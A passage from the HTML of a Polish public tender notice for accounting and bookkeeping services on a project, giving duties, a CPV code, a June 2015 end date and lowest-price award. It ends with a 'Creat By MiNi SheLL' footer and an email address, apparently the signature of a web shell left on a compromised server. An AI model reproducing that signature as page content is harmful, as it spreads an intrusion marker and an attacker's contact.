c)	rozliczanie podatku dochodowego od osób fizycznych;
d)	bieżące prowadzenie wyodrębnionej ewidencji księgowej dla w/w projektu;
e)	dekretowania dokumentów księgowych zgodnie z obowiązującymi przepisami;
f)	uzgadnianie obrotów i sald kont pomocniczych z saldami i zapisami na kontach księgi głównej na koniec każdego miesiąca;
g)	sporządzanie przelewów bankowych z wyodrębnionych dla w/w projektu kont bankowych;
h)	wprowadzanie danych do systemu finansowo - księgowego Powiat
i)	pobieranie i księgowanie wyciągów bankowych;
j)	przekazywanie dokumentacji finansowo - księgowej do specjalisty ds. przetargów i sprawozdawczości,
k)	dyspozycyjność - praca na umowę zlecenie w wymiarze 35 godzin miesięcznie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.20.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com